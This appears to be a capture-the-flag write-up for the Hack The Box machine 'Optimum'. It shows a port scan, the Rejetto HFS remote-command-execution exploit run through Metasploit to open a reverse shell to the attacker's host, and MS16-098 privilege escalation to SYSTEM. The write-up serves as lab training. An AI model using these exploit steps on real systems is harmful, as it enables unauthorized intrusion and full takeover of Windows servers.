Optimum

OS: Windows, Difficulty: Easy, IP: 10.10.10.8

Initial Enumeration

# Nmap 7.70 scan initiated Mon Jul 15 21:15:18 2019 as: nmap --min-parallelism 500 -p- -T5 -oN T-all 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.45s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Mon Jul 15 21:17:01 2019 -- 1 IP address (1 host up) scanned in 102.76 seconds

Only port 80 was open.

Server - HTTP File Server (HFS)

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                             | exploits/osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                       | exploits/osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                   | exploits/osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                            | exploits/osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                    | exploits/windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                   | exploits/linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                        | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                             | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                           | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                           | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                      | exploits/windows/webapps/34852.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There's a RCE MSF module.

msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Using URL: http://0.0.0.0:8080/NBj722WLq5tm
[*] Local IP: http://192.168.219.136:8080/NBj722WLq5tm
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /NBj722WLq5tm
[*] Sending stage (179779 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.8:49162) at 2019-07-15 21:25:49 +0530
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\KYbWZVdbNMHQ.vbs' on the target
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

meterpreter >
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

User Own

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39***

Root Own

Used this tool to get exploit suggestions 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-1)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

Exploit MS16-098 worked for me using the following repository

meterpreter > upload bfill.exe
[*] uploading  : bfill.exe -> bfill.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): bfill.exe -> bfill.exe
[*] uploaded   : bfill.exe -> bfill.exe
meterpreter > shell
Process 1088 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

22/07/2019  04:20     <DIR>          .
22/07/2019  04:20     <DIR>          ..
22/07/2019  03:47     <DIR>          %TEMP%
22/07/2019  04:21            560.128 bfill.exe
18/03/2017  03:11            760.320 hfs.exe
22/07/2019  04:02             10.952 path.txt
22/07/2019  04:02              3.456 Servicenames.txt
22/07/2019  04:02              1.662 services.txt
22/07/2019  04:07              3.334 systeminfo.txt
18/03/2017  03:13                 32 user.txt.txt
               7 File(s)      1.339.884 bytes
               3 Dir(s)  31.888.527.360 bytes free

C:\Users\kostas\Desktop>bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
51ed1***

Learning Outcome

Try different windows exploit suggester rather than sticking to the Meterpreter one. I tried with the default one in MSF, and it did not suggest anything good.

EDIT: Learn to migrate to x64 bit Shell if the box is 64bit as I missed one exploit due to not migrating to 64bit.

PreviousLegacyNextArctic

Last updated